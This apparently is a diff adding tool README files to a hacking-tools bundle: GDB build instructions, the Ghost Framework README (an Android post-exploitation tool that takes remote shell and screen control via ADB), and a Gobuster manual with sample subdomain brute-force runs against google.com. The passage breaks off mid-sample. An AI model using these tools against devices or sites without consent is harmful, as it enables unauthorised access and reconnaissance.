+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
README for GDB release
+
This is GDB, the GNU source-level debugger.
+
A summary of new features is in the file `gdb/NEWS'.
+
Check the GDB home page at http://www.gnu.org/software/gdb/ for up to
date release information, mailing list links and archives, etc.
+
GDB's bug tracking data base can be found at
http://www.gnu.org/software/gdb/bugs/
+
Unpacking and Installation -- quick overview
==========================
+
The release is provided as a gzipped tar file called
'gdb-VERSION.tar.gz', where VERSION is the version of GDB.
+
The GDB debugger sources, the generic GNU include
files, the BFD ("binary file description") library, the readline
library, and other libraries all have directories of their own
underneath the gdb-VERSION directory. The idea is that a variety of GNU
tools can share a common copy of these things. Be aware of variation
over time--for example don't try to build GDB with a copy of bfd from
a release other than the GDB release (such as a binutils release),
especially if the releases are more than a few weeks apart.
Configuration scripts and makefiles exist to cruise up and down this
directory tree and automatically build all the pieces in the right
order.
+
When you unpack the gdb-VERSION.tar.gz file, it will create a
source directory called `gdb-VERSION'.
+
You can build GDB right in the source directory:
+
cd gdb-VERSION
./configure --prefix=/usr/local (or wherever you want)
make all install
+
However, we recommend that an empty directory be used instead.
This way you do not clutter your source tree with binary files
and will be able to create different builds with different
configuration options.
+
You can build GDB in any empty build directory:
+
mkdir build
cd build
<full path to your sources>/gdb-VERSION/configure [etc...]
make all install
+
(Building GDB with DJGPP tools for MS-DOS/MS-Windows is slightly
different; see the file gdb-VERSION/gdb/config/djgpp/README for details.)
+
This will configure and build all the libraries as well as GDB. If
`configure' can't determine your system type, specify one as its
argument, e.g., `./configure sun4' or `./configure decstation'.
+
Make sure that your 'configure' line ends in 'gdb-VERSION/configure':
+
/berman/migchain/source/gdb-VERSION/configure # RIGHT
/berman/migchain/source/gdb-VERSION/gdb/configure # WRONG
+
The GDB package contains several subdirectories, such as 'gdb',
'bfd', and 'readline'. If your 'configure' line ends in
'gdb-VERSION/gdb/configure', then you are configuring only the gdb
subdirectory, not the whole GDB package. This leads to build errors
such as:
+
make: *** No rule to make target `../bfd/bfd.h', needed by `gdb.o'. Stop.
+
If you get other compiler errors during this stage, see the `Reporting
Bugs' section below; there are a few known problems.
+
GDB's `configure' script has many options to enable or disable
different features or dependencies. These options are not generally
known to the top-level `configure', so if you want to see a complete
list of options, invoke the subdirectory `configure', like:
+
/berman/migchain/source/gdb-VERSION/gdb/configure --help
+
(Take note of how this differs from the invocation used to actually
configure the build tree.)
+
GDB requires a C++11 compiler. If you do not have a
C++11 compiler for your system, you may be able to download and install
the GNU CC compiler. It is available via anonymous FTP from the
directory `ftp://ftp.gnu.org/pub/gnu/gcc'. GDB also requires an ISO
C standard library. The GDB remote server, GDBserver, builds with some
non-ISO standard libraries - e.g. for Windows CE.
+
GDB can optionally be built against various external libraries.
These dependencies are described below in the "`configure options"
section of this README.
+
GDB can be used as a cross-debugger, running on a machine of one
type while debugging a program running on a machine of another type.
See below.
+
+
More Documentation
******************
+
All the documentation for GDB comes as part of the machine-readable
distribution. The documentation is written in Texinfo format, which
is a documentation system that uses a single source file to produce
both on-line information and a printed manual. You can use one of the
Info formatting commands to create the on-line version of the
documentation and TeX (or `texi2roff') to typeset the printed version.
+
GDB includes an already formatted copy of the on-line Info version
of this manual in the `gdb/doc' subdirectory. The main Info file is
`gdb-VERSION/gdb/doc/gdb.info', and it refers to subordinate files
matching `gdb.info*' in the same directory. If necessary, you can
print out these files, or read them with any editor; but they are
easier to read using the `info' subsystem in GNU Emacs or the
standalone `info' program, available as part of the GNU Texinfo
distribution.
+
If you want to format these Info files yourself, you need one of the
Info formatting programs, such as `texinfo-format-buffer' or
`makeinfo'.
+
If you have `makeinfo' installed, and are in the top level GDB
source directory (`gdb-VERSION'), you can make the Info file by
typing:
+
cd gdb/doc
make info
+
If you want to typeset and print copies of this manual, you need
TeX, a program to print its DVI output files, and `texinfo.tex', the
Texinfo definitions file. This file is included in the GDB
distribution, in the directory `gdb-VERSION/texinfo'.
+
TeX is a typesetting program; it does not print files directly, but
produces output files called DVI files. To print a typeset document,
you need a program to print DVI files. If your system has TeX
installed, chances are it has such a program. The precise command to
use depends on your system; `lpr -d' is common; another (for PostScript
devices) is `dvips'. The DVI print command may require a file name
without any extension or a `.dvi' extension.
+
TeX also requires a macro definitions file called `texinfo.tex'.
This file tells TeX how to typeset a document written in Texinfo
format. On its own, TeX cannot read, much less typeset a Texinfo file.
`texinfo.tex' is distributed with GDB and is located in the
`gdb-VERSION/texinfo' directory.
+
If you have TeX and a DVI printer program installed, you can typeset
and print this manual. First switch to the `gdb' subdirectory of
the main source directory (for example, to `gdb-VERSION/gdb') and then type:
+
make doc/gdb.dvi
+
If you prefer to have the manual in PDF format, type this from the
`gdb/doc' subdirectory of the main source directory:
+
make gdb.pdf
+
For this to work, you will need the PDFTeX package to be installed.
+
+
Installing GDB
**************
+
GDB comes with a `configure' script that automates the process of
preparing GDB for installation; you can then use `make' to build the
`gdb' program.
+
The GDB distribution includes all the source code you need for GDB in
a single directory. That directory contains:
+
`gdb-VERSION/{COPYING,COPYING.LIB}'
Standard GNU license files. Please read them.
+
`gdb-VERSION/bfd'
source for the Binary File Descriptor library
+
`gdb-VERSION/config*'
script for configuring GDB, along with other support files
+
`gdb-VERSION/gdb'
the source specific to GDB itself
+
`gdb-VERSION/include'
GNU include files
+
`gdb-VERSION/libiberty'
source for the `-liberty' free software library
+
`gdb-VERSION/opcodes'
source for the library of opcode tables and disassemblers
+
`gdb-VERSION/readline'
source for the GNU command-line interface
NOTE: The readline library is compiled for use by GDB, but will
not be installed on your system when "make install" is issued.
+
`gdb-VERSION/sim'
source for some simulators (ARM, D10V, SPARC, M32R, MIPS, PPC, V850, etc)
+
`gdb-VERSION/texinfo'
The `texinfo.tex' file, which you need in order to make a printed
manual using TeX.
+
`gdb-VERSION/etc'
Coding standards, useful files for editing GDB, and other
miscellanea.
+
Note: the following instructions are for building GDB on Unix or
Unix-like systems. Instructions for building with DJGPP for
MS-DOS/MS-Windows are in the file gdb/config/djgpp/README.
+
The simplest way to configure and build GDB is to run `configure'
from the `gdb-VERSION' directory.
+
First switch to the `gdb-VERSION' source directory if you are
not already in it; then run `configure'.
+
For example:
+
cd gdb-VERSION
./configure
make
+
Running `configure' followed by `make' builds the `bfd',
`readline', `mmalloc', and `libiberty' libraries, then `gdb' itself.
The configured source files, and the binaries, are left in the
corresponding source directories.
+
`configure' is a Bourne-shell (`/bin/sh') script; if your system
does not recognize this automatically when you run a different shell,
you may need to run `sh' on it explicitly:
+
sh configure
+
If you run `configure' from a directory that contains source
directories for multiple libraries or programs, `configure' creates
configuration files for every directory level underneath (unless
you tell it not to, with the `--norecursion' option).
+
You can install `gdb' anywhere; it has no hardwired paths. However,
you should make sure that the shell on your path (named by the `SHELL'
environment variable) is publicly readable. Remember that GDB uses the
shell to start your program--some systems refuse to let GDB debug child
processes whose programs are not readable.
+
+
Compiling GDB in another directory
==================================
+
If you want to run GDB versions for several host or target machines,
you need a different `gdb' compiled for each combination of host and
target. `configure' is designed to make this easy by allowing you to
generate each configuration in a separate subdirectory, rather than in
the source directory. If your `make' program handles the `VPATH'
feature correctly (GNU `make' and SunOS 'make' are two that should),
running `make' in each of these directories builds the `gdb' program
specified there.
+
To build `gdb' in a separate directory, run `configure' with the
`--srcdir' option to specify where to find the source. (You also need
to specify a path to find `configure' itself from your working
directory. If the path to `configure' would be the same as the
argument to `--srcdir', you can leave out the `--srcdir' option; it
will be assumed.)
+
For example, you can build GDB in a separate
directory for a Sun 4 like this:
+
cd gdb-VERSION
mkdir ../gdb-sun4
cd ../gdb-sun4
../gdb-VERSION/configure
make
+
When `configure' builds a configuration using a remote source
directory, it creates a tree for the binaries with the same structure
(and using the same names) as the tree under the source directory. In
the example, you'd find the Sun 4 library `libiberty.a' in the
directory `gdb-sun4/libiberty', and GDB itself in `gdb-sun4/gdb'.
+
One popular reason to build several GDB configurations in separate
directories is to configure GDB for cross-compiling (where GDB runs on
one machine--the host--while debugging programs that run on another
machine--the target). You specify a cross-debugging target by giving
the `--target=TARGET' option to `configure'.
+
When you run `make' to build a program or library, you must run it
in a configured directory--whatever directory you were in when you
called `configure' (or one of its subdirectories).
+
The `Makefile' that `configure' generates in each source directory
also runs recursively. If you type `make' in a source directory such
as `gdb-VERSION' (or in a separate configured directory configured with
`--srcdir=PATH/gdb-VERSION'), you will build all the required libraries,
and then build GDB.
+
When you have multiple hosts or targets configured in separate
directories, you can run `make' on them in parallel (for example, if
they are NFS-mounted on each of the hosts); they will not interfere
with each other.
+
+
Specifying names for hosts and targets
======================================
+
The specifications used for hosts and targets in the `configure'
script are based on a three-part naming scheme, but some short
predefined aliases are also supported. The full naming scheme encodes
three pieces of information in the following pattern:
+
ARCHITECTURE-VENDOR-OS
+
For example, you can use the alias `sun4' as a HOST argument or in a
`--target=TARGET' option. The equivalent full name is
`sparc-sun-sunos4'.
+
The `configure' script accompanying GDB does not provide any query
facility to list all supported host and target names or aliases.
`configure' calls the Bourne shell script `config.sub' to map
abbreviations to full names; you can read the script, if you wish, or
you can use it to test your guesses on abbreviations--for example:
+
% sh config.sub sun4
sparc-sun-sunos4.1.1
% sh config.sub sun3
m68k-sun-sunos4.1.1
% sh config.sub decstation
mips-dec-ultrix4.2
% sh config.sub hp300bsd
m68k-hp-bsd
% sh config.sub i386v
i386-pc-sysv
% sh config.sub i786v
Invalid configuration `i786v': machine `i786v' not recognized
+
`config.sub' is also distributed in the GDB source directory.
+
+
`configure' options
===================
+
Here is a summary of the `configure' options and arguments that are
most often useful for building GDB. `configure' also has several other
options not listed here. There are many options to gdb's `configure'
script, some of which are only useful in special situation.
*note : (autoconf.info)Running configure scripts, for a full
explanation of `configure'.
+
configure [--help]
[--prefix=DIR]
[--srcdir=PATH]
[--target=TARGET]
[--host=HOST]
[HOST]
+
You may introduce options with a single `-' rather than `--' if you
prefer; but you may abbreviate option names if you use `--'. Some
more obscure GDB `configure' options are not listed here.
+
`--help'
Display a quick summary of how to invoke `configure'.
+
`-prefix=DIR'
Configure the source to install programs and files under directory
`DIR'.
+
`--srcdir=PATH'
*Warning: using this option requires GNU `make', or another `make'
that compatibly implements the `VPATH' feature.*
Use this option to make configurations in directories separate
from the GDB source directories. Among other things, you can use
this to build (or maintain) several configurations simultaneously,
in separate directories. `configure' writes configuration
specific files in the current directory, but arranges for them to
use the source in the directory PATH. `configure' will create
directories under the working directory in parallel to the source
directories below PATH.
+
`--host=HOST'
Configure GDB to run on the specified HOST.
+
There is no convenient way to generate a list of all available
hosts.
+
`HOST ...'
Same as `--host=HOST'. If you omit this, GDB will guess; it's
quite accurate.
+
`--target=TARGET'
Configure GDB for cross-debugging programs running on the specified
TARGET. Without this option, GDB is configured to debug programs
that run on the same machine (HOST) as GDB itself.
+
There is no convenient way to generate a list of all available
targets.
+
`--enable-targets=TARGET,TARGET,...'
`--enable-targets=all`
Configure GDB for cross-debugging programs running on the
specified list of targets. The special value `all' configures
GDB for debugging programs running on any target it supports.
+
`--with-gdb-datadir=PATH'
Set the GDB-specific data directory. GDB will look here for
certain supporting files or scripts. This defaults to the `gdb'
subdirectory of `datadir' (which can be set using `--datadir').
+
`--with-relocated-sources=DIR'
Sets up the default source path substitution rule so that
directory names recorded in debug information will be
automatically adjusted for any directory under DIR. DIR should
be a subdirectory of GDB's configured prefix, the one mentioned
in the `--prefix' or `--exec-prefix' options to configure. This
option is useful if GDB is supposed to be moved to a different
place after it is built.
+
`--enable-64-bit-bfd'
Enable 64-bit support in BFD on 32-bit hosts.
+
`--disable-gdbmi'
Build GDB without the GDB/MI machine interface.
+
`--enable-tui'
Build GDB with the text-mode full-screen user interface (TUI).
Requires a curses library (ncurses and cursesX are also
supported).
+
`--with-curses'
Use the curses library instead of the termcap library, for
text-mode terminal operations.
+
`--with-debuginfod'
Build GDB with libdebuginfod, the debuginfod client library. Used
to automatically fetch source files and separate debug files from
debuginfod servers using the associated executable's build ID.
Enabled by default if libdebuginfod is installed and found at
configure time. debuginfod is packaged with elfutils, starting
with version 0.178. You can get the latest version from
'https://sourceware.org/elfutils/'.
+
`--with-libunwind-ia64'
Use the libunwind library for unwinding function call stack on ia64
target platforms.
See http://www.nongnu.org/libunwind/index.html for details.
+
`--with-system-readline'
Use the readline library installed on the host, rather than the
library supplied as part of GDB. Readline 7 or newer is required;
this is enforced by the build system.
+
`--with-system-zlib
Use the zlib library installed on the host, rather than the
library supplied as part of GDB.
+
`--with-expat'
Build GDB with Expat, a library for XML parsing. (Done by
default if libexpat is installed and found at configure time.)
This library is used to read XML files supplied with GDB. If it
is unavailable, some features, such as remote protocol memory
maps, target descriptions, and shared library lists, that are
based on XML files, will not be available in GDB. If your host
does not have libexpat installed, you can get the latest version
from `http://expat.sourceforge.net'.
+
`--with-libiconv-prefix[=DIR]'
Build GDB with GNU libiconv, a character set encoding conversion
library. This is not done by default, as on GNU systems the
`iconv' that is built in to the C library is sufficient. If your
host does not have a working `iconv', you can get the latest
version of GNU iconv from `https://www.gnu.org/software/libiconv/'.
+
GDB's build system also supports building GNU libiconv as part of
the overall build. See the GDB manual instructions on how to do
this.
+
`--with-lzma'
Build GDB with LZMA, a compression library. (Done by default if
liblzma is installed and found at configure time.) LZMA is used
by GDB's "mini debuginfo" feature, which is only useful on
platforms using the ELF object file format. If your host does
not have liblzma installed, you can get the latest version from
`https://tukaani.org/xz/'.
+
`--with-libgmp-prefix=DIR'
Build GDB using the GMP library installed at the directory DIR.
If your host does not have GMP installed, you can get the latest
version at `https://gmplib.org/'.
+
`--with-mpfr'
Build GDB with GNU MPFR, a library for multiple-precision
floating-point computation with correct rounding. (Done by
default if GNU MPFR is installed and found at configure time.)
This library is used to emulate target floating-point arithmetic
during expression evaluation when the target uses different
floating-point formats than the host. If GNU MPFR is not
available, GDB will fall back to using host floating-point
arithmetic. If your host does not have GNU MPFR installed, you
can get the latest version from `https://www.mpfr.org/'.
+
`--with-python[=PYTHON]'
Build GDB with Python scripting support. (Done by default if
libpython is present and found at configure time.) Python makes
GDB scripting much more powerful than the restricted CLI
scripting language. If your host does not have Python installed,
you can find it on `http://www.python.org/download/'. The oldest
version of Python supported by GDB is 2.6. The optional argument
PYTHON is used to find the Python headers and libraries. It can
be either the name of a Python executable, or the name of the
directory in which Python is installed.
+
`--with-guile[=GUILE]'
Build GDB with GNU Guile scripting support. (Done by default if
libguile is present and found at configure time.) If your host
does not have Guile installed, you can find it at
`https://www.gnu.org/software/guile/'. The optional argument
GUILE can be a version number, which will cause `configure' to
try to use that version of Guile; or the file name of a
`pkg-config' executable, which will be queried to find the
information needed to compile and link against Guile.
+
`--enable-source-highlight'
When printing source code, use source highlighting. This requires
libsource-highlight to be installed and is enabled by default
if the library is found.
+
`--with-xxhash'
Use libxxhash for hashing. This has no user-visible effect but
speeds up various GDB operations such as symbol loading. Enabled
by default if libxxhash is found.
+
`--without-included-regex'
Don't use the regex library included with GDB (as part of the
libiberty library). This is the default on hosts with version 2
of the GNU C library.
+
`--with-sysroot=DIR'
Use DIR as the default system root directory for libraries whose
file names begin with `/lib' or `/usr/lib'. (The value of DIR
can be modified at run time by using the "set sysroot" command.)
If DIR is under the GDB configured prefix (set with `--prefix' or
`--exec-prefix' options), the default system root will be
automatically adjusted if and when GDB is moved to a different
location.
+
`--with-system-gdbinit=FILE'
Configure GDB to automatically load a system-wide init file.
FILE should be an absolute file name. If FILE is in a directory
under the configured prefix, and GDB is moved to another location
after being built, the location of the system-wide init file will
be adjusted accordingly.
+
`--with-system-gdbinit-dir=DIR'
Configure GDB to automatically load system-wide init files from
a directory. Files with extensions `.gdb', `.py' (if Python
support is enabled) and `.scm' (if Guile support is enabled) are
supported. DIR should be an absolute directory name. If DIR is
in a directory under the configured prefix, and GDB is moved to
another location after being built, the location of the system-
wide init directory will be adjusted accordingly.
+
`--enable-build-warnings'
When building the GDB sources, ask the compiler to warn about any
code which looks even vaguely suspicious. It passes many
different warning flags, depending on the exact version of the
compiler you are using.
+
`--enable-werror'
Treat compiler warnings as werrors. It adds the -Werror flag to
the compiler, which will fail the compilation if the compiler
outputs any warning messages.
+
`--enable-ubsan'
Enable the GCC undefined behavior sanitizer. By default this is
disabled in GDB releases, but enabled when building from git.
The undefined behavior sanitizer checks for C++ undefined
behavior. It has a performance cost, so if you are looking at
GDB's performance, you should disable it.
+
`--enable-unit-tests[=yes|no]'
Enable (i.e., include) support for unit tests when compiling GDB
and GDBServer. Note that if this option is not passed, GDB will
have selftests if it is a development build, and will *not* have
selftests if it is a non-development build.
+
`configure' accepts other options, for compatibility with configuring
other GNU tools recursively.
+
+
Remote debugging
=================
+
The files m68k-stub.c, i386-stub.c, and sparc-stub.c are examples
of remote stubs to be used with remote.c. They are designed to run
standalone on an m68k, i386, or SPARC cpu and communicate properly
with the remote.c stub over a serial line.
+
The directory gdbserver/ contains `gdbserver', a program that
allows remote debugging for Unix applications. GDBserver is only
supported for some native configurations.
+
The file gdbserver/README includes further notes on GDBserver; in
particular, it explains how to build GDBserver for cross-debugging
(where GDBserver runs on the target machine, which is of a different
architecture than the host machine running GDB).
+
+
Reporting Bugs in GDB
=====================
+
There are several ways of reporting bugs in GDB. The prefered
method is to use the World Wide Web:
+
http://www.gnu.org/software/gdb/bugs/
+
As an alternative, the bug report can be submitted, via e-mail, to the
address "bug-gdb@gnu.org".
+
When submitting a bug, please include the GDB version number, and
how you configured it (e.g., "sun4" or "mach386 host,
i586-intel-synopsys target"). Since GDB supports so many
different configurations, it is important that you be precise about
this. The simplest way to do this is to include the output from these
commands:
+
% gdb --version
% gdb --config
+
For more information on how/whether to report bugs, see the
Reporting Bugs chapter of the GDB manual (gdb/doc/gdb.texinfo).
+
+
Graphical interface to GDB -- X Windows, MS Windows
==========================
+
Several graphical interfaces to GDB are available. You should
check:
+
https://sourceware.org/gdb/wiki/GDB%20Front%20Ends
+
for an up-to-date list.
+
Emacs users will very likely enjoy the Grand Unified Debugger mode;
try typing `M-x gdb RET'.
+
+
Writing Code for GDB
=====================
+
There is information about writing code for GDB in the file
`CONTRIBUTE' and at the website:
+
http://www.gnu.org/software/gdb/
+
in particular in the wiki.
+
If you are pondering writing anything but a short patch, especially
take note of the information about copyrights and copyright assignment.
It can take quite a while to get all the paperwork done, so
we encourage you to start that process as soon as you decide you are
planning to work on something, or at least well ahead of when you
think you will be ready to submit the patches.
+
+
GDB Testsuite
=============
+
Included with the GDB distribution is a DejaGNU based testsuite
that can either be used to test your newly built GDB, or for
regression testing a GDB with local modifications.
+
Running the testsuite requires the prior installation of DejaGNU,
which is generally available via ftp. The directory
ftp://sources.redhat.com/pub/dejagnu/ will contain a recent snapshot.
Once DejaGNU is installed, you can run the tests in one of the
following ways:
+
(1) cd gdb-VERSION
make check-gdb
+
or
+
(2) cd gdb-VERSION/gdb
make check
+
or
+
(3) cd gdb-VERSION/gdb/testsuite
make site.exp (builds the site specific file)
runtest -tool gdb GDB=../gdb (or GDB=<somepath> as appropriate)
+
When using a `make'-based method, you can use the Makefile variable
`RUNTESTFLAGS' to pass flags to `runtest', e.g.:
+
make RUNTESTFLAGS=--directory=gdb.cp check
+
If you use GNU make, you can use its `-j' option to run the testsuite
in parallel. This can greatly reduce the amount of time it takes for
the testsuite to run. In this case, if you set `RUNTESTFLAGS' then,
by default, the tests will be run serially even under `-j'. You can
override this and force a parallel run by setting the `make' variable
`FORCE_PARALLEL' to any non-empty value. Note that the parallel `make
check' assumes that you want to run the entire testsuite, so it is not
compatible with some dejagnu options, like `--directory'.
+
The last method gives you slightly more control in case of problems
with building one or more test executables or if you are using the
testsuite `standalone', without it being part of the GDB source tree.
+
See the DejaGNU documentation for further details.
+
+
Copyright and License Notices
=============================
+
Most files maintained by the GDB Project contain a copyright notice
as well as a license notice, usually at the start of the file.
+
To reduce the length of copyright notices, consecutive years in the
copyright notice can be combined into a single range. For instance,
the following list of copyright years...
+
1986, 1988, 1989, 1991-1993, 1999, 2000, 2007, 2008, 2009, 2010, 2011
+
... is abbreviated into:
+
1986, 1988-1989, 1991-1993, 1999-2000, 2007-2011
+
Every year of each range, inclusive, is a copyrightable year that
could be listed individually.
+
(this is for editing this file with GNU emacs)
Local Variables:
mode: text
End:
+
+ + + +
+ +
+ + + + +
+ + +
+ + +
+
+ + +
+ + + +
+
+ +
+
+ +
+ + + + + + + + + + + + + + + + + + + + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/geoip.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/geoip.md new file mode 100755 index 00000000..16e29adb --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/geoip.md @@ -0,0 +1 @@ +Latitude and longitude are not precise and should not be used to identify a particular street address or household. diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/ghost.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/ghost.md new file mode 100755 index 00000000..b724d648 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/ghost.md @@ -0,0 +1,121 @@ +# Ghost Framework + +

logo

+ +

+ + + + + + + + + + + + + + + + + + +

+ +

ghost_1

+ +*** + +# About Ghost Framework + +``` +Ghost Framework is an Android post-exploitation framework that exploits the +Android Debug Bridge to remotely access an Android device. Ghost Framework +gives you the power and convenience of remote Android device administration. +``` + +*** + +# Getting started + +
+Ghost installation + +``` +To install Ghost Framework you should +execute the following commands. +``` + +> cd ghost + +> chmod +x install.sh + +> ./install.sh + +
+ +
+Ghost uninstallation + +``` +To uninstall Ghost Framework you should +execute the following commands. +``` + +> cd ghost + +> chmod +x uninstall.sh + +> ./uninstall.sh + +
+ +*** + +# Ghost Framework execution + +``` +To run Ghost Framework you should +execute the following command. +``` + +> ghost + +*** + +# Why Ghost Framework + +* Simple and clear UX/UI. + +``` +Ghost Framework has a simple and clear UX/UI. +It is easy to understand and it will be easier +for you to master the Ghost Framework. +``` + +* Device shell access. + +``` +Ghost Framework has the ability to access the remote Android +device shell without using OpenSSH or other protocols. +``` + +* Controlling device screen + +``` +Ghost Framework has the ability to access device screen +and control it remotely using mouse and keyboard. +``` + +

ghost_2

+ +*** + +# Ghost Framework disclaimer + +``` +Usage of the Ghost Framework for attacking targets without prior mutual consent is illegal. +It is the end user's responsibility to obey all applicable local, state, federal, and international laws. +Developers assume no liability and are not responsible for any misuse or damage caused by this program. +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gobuster.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gobuster.md new file mode 100755 index 00000000..9b5e4cfa --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/G/gobuster.md @@ -0,0 +1,822 @@ +# Gobuster + +Gobuster is a tool used to brute-force: + +- URIs (directories and files) in web sites. +- DNS subdomains (with wildcard support). +- Virtual Host names on target web servers. +- Open Amazon S3 buckets + +## Tags, Statuses, etc + +[![Build Status](https://travis-ci.com/OJ/gobuster.svg?branch=master)](https://travis-ci.com/OJ/gobuster) [![Backers on Open Collective](https://opencollective.com/gobuster/backers/badge.svg)](https://opencollective.com/gobuster) [![Sponsors on Open Collective](https://opencollective.com/gobuster/sponsors/badge.svg)](https://opencollective.com/gobuster) + + +## Love this tool? Back it! + +If you're backing us already, you rock. If you're not, that's cool too! Want to back us? [Become a backer](https://opencollective.com/gobuster#backer)! + +[![Backers](https://opencollective.com/gobuster/backers.svg?width=890)](https://opencollective.com/gobuster#backers) + +All funds that are donated to this project will be donated to charity. A full log of charity donations will be available in this repository as they are processed. + +# Changes + +## 3.4 + +- Enable TLS1.0 and TLS1.1 support +- Add TFTP mode to search for files on tftp servers + +## 3.3 + +- Support TLS client certificates / mtls +- support loading extensions from file +- support fuzzing POST body, HTTP headers and basic auth +- new option to not canonicalize header names + +## 3.2 + +- Use go 1.19 +- use contexts in the correct way +- get rid of the wildcard flag (except in DNS mode) +- color output +- retry on timeout +- google cloud bucket enumeration +- fix nil reference errors + +## 3.1 + +- enumerate public AWS S3 buckets +- fuzzing mode +- specify HTTP method +- added support for patterns. You can now specify a file containing patterns that are applied to every word, one by line. Every occurrence of the term `{GOBUSTER}` in it will be replaced with the current wordlist item. Please use with caution as this can cause increase the number of requests issued a lot. +- The shorthand `p` flag which was assigned to proxy is now used by the pattern flag + +## 3.0 + +- New CLI options so modes are strictly separated (`-m` is now gone!) +- Performance Optimizations and better connection handling +- Ability to enumerate vhost names +- Option to supply custom HTTP headers + +# License + +See the LICENSE file. + +# Manual + +## Available Modes + +- dir - the classic directory brute-forcing mode +- dns - DNS subdomain brute-forcing mode +- s3 - Enumerate open S3 buckets and look for existence and bucket listings +- gcs - Enumerate open google cloud buckets +- vhost - virtual host brute-forcing mode (not the same as DNS!) +- fuzz - some basic fuzzing, replaces the `FUZZ` keyword + +## Easy Installation + +### Binary Releases + +We are now shipping binaries for each of the releases so that you don't even have to build them yourself! How wonderful is that! + +If you're stupid enough to trust binaries that I've put together, you can download them from the [releases](https://github.com/OJ/gobuster/releases) page. + +### Using `go install` + +If you have a [Go](https://golang.org/) environment ready to go (at least go 1.19), it's as easy as: + +```bash +go install github.com/OJ/gobuster/v3@latest +``` + +PS: You need at least go 1.19 to compile gobuster. + +### Building From Source + +Since this tool is written in [Go](https://golang.org/) you need to install the Go language/compiler/etc. Full details of installation and set up can be found [on the Go language website](https://golang.org/doc/install). Once installed you have two options. You need at least go 1.19 to compile gobuster. + +### Compiling + +`gobuster` has external dependencies, and so they need to be pulled in first: + +```bash +go get && go build +``` + +This will create a `gobuster` binary for you. If you want to install it in the `$GOPATH/bin` folder you can run: + +```bash +go install +``` + +## Modes + +Help is built-in! + +- `gobuster help` - outputs the top-level help. +- `gobuster help ` - outputs the help specific to that mode. + +## `dns` Mode + +### Options + +```text +Uses DNS subdomain enumeration mode + +Usage: + gobuster dns [flags] + +Flags: + -d, --domain string The target domain + -h, --help help for dns + -r, --resolver string Use custom DNS server (format server.com or server.com:port) + -c, --show-cname Show CNAME records (cannot be used with '-i' option) + -i, --show-ips Show IP addresses + --timeout duration DNS resolver timeout (default 1s) + --wildcard Force continued operation when wildcard found + +Global Flags: + --delay duration Time each thread waits between requests (e.g. 1500ms) + --no-color Disable color output + --no-error Don't display errors + -z, --no-progress Don't display progress + -o, --output string Output file to write results to (defaults to stdout) + -p, --pattern string File containing replacement patterns + -q, --quiet Don't print the banner and other noise + -t, --threads int Number of concurrent threads (default 10) + -v, --verbose Verbose output (errors) + -w, --wordlist string Path to the wordlist +``` + +### Examples + + +```text +gobuster dns -d mysite.com -t 50 -w common-names.txt +``` + +Normal sample run goes like this: + +```text +gobuster dns -d google.com -w ~/wordlists/subdomains.txt + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dns +[+] Url/Domain : google.com +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/subdomains.txt +=============================================================== +2019/06/21 11:54:20 Starting gobuster +=============================================================== +Found: chrome.google.com +Found: ns1.google.com +Found: admin.google.com +Found: www.google.com +Found: m.google.com +Found: support.google.com +Found: translate.google.com +Found: cse.google.com +Found: news.google.com +Found: music.google.com +Found: mail.google.com +Found: store.google.com +Found: mobile.google.com +Found: search.google.com +Found: wap.google.com +Found: directory.google.com +Found: local.google.com +Found: blog.google.com +=============================================================== +2019/06/21 11:54:20 Finished +=============================================================== +``` + +Show IP sample run goes like this: + +```text +gobuster dns -d google.com -w ~/wordlists/subdomains.txt -i + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dns +[+] Url/Domain : google.com +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/subdomains.txt +=============================================================== +2019/06/21 11:54:54 Starting gobuster +=============================================================== +Found: www.google.com [172.217.25.36, 2404:6800:4006:802::2004] +Found: admin.google.com [172.217.25.46, 2404:6800:4006:806::200e] +Found: store.google.com [172.217.167.78, 2404:6800:4006:802::200e] +Found: mobile.google.com [172.217.25.43, 2404:6800:4006:802::200b] +Found: ns1.google.com [216.239.32.10, 2001:4860:4802:32::a] +Found: m.google.com [172.217.25.43, 2404:6800:4006:802::200b] +Found: cse.google.com [172.217.25.46, 2404:6800:4006:80a::200e] +Found: chrome.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: search.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: local.google.com [172.217.25.46, 2404:6800:4006:80a::200e] +Found: news.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: blog.google.com [216.58.199.73, 2404:6800:4006:806::2009] +Found: support.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: wap.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: directory.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: translate.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: music.google.com [172.217.25.46, 2404:6800:4006:802::200e] +Found: mail.google.com [172.217.25.37, 2404:6800:4006:802::2005] +=============================================================== +2019/06/21 11:54:55 Finished +=============================================================== +``` + +Base domain validation warning when the base domain fails to resolve. This is a warning rather than a failure in case the user fat-fingers while typing the domain. + +```text +gobuster dns -d yp.to -w ~/wordlists/subdomains.txt -i + +=============================================================== +Gobuster v3.2.0 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) +=============================================================== +[+] Mode : dns +[+] Url/Domain : yp.to +[+] Threads : 10 +[+] Wordlist : /home/oj/wordlists/subdomains.txt +=============================================================== +2019/06/21 11:56:43 Starting gobuster +=============================================================== +2019/06/21 11:56:53 